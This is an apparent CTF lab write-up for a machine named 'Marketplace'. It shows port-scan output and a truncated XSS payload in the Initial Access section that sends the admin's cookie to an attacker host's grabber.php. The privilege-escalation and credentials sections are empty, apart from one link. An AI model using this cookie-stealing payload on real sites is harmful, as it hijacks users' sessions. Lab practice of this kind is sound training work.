Marketplace
Marketplace
Initial Scan
root@ip-10-10-112-185:~# rustscan -a 10.10.166.219 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.\U0001f422
Marketplace 1
| 256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA2ol/CJc6HIWgvu6KQ7lZ6WWgN
80/tcp open http syn-ack nginx 1.19.2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-server-header: nginx/1.19.2
|_http-title: The Marketplace
32768/tcp open http syn-ack Node.js (Express middleware)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-title: The Marketplace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access
🚨 Tried to do a lot a stuff, XSS, JSON web token, SQL injections. But the
XSS works the better. There is a page only admin can acces if i can steal
the admin cookie with the XSS i would be able to access the admin page
<script>document.location='http://10.10.112.185:8000/XSS/grabber.php?c='+doc
Marketplace 2
Privilege Escalation
🚨
Futher Ennumeration
🚨
Marketplace 3
Creds
Services User names Passwords
Exploits links
https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/
Marketplace 4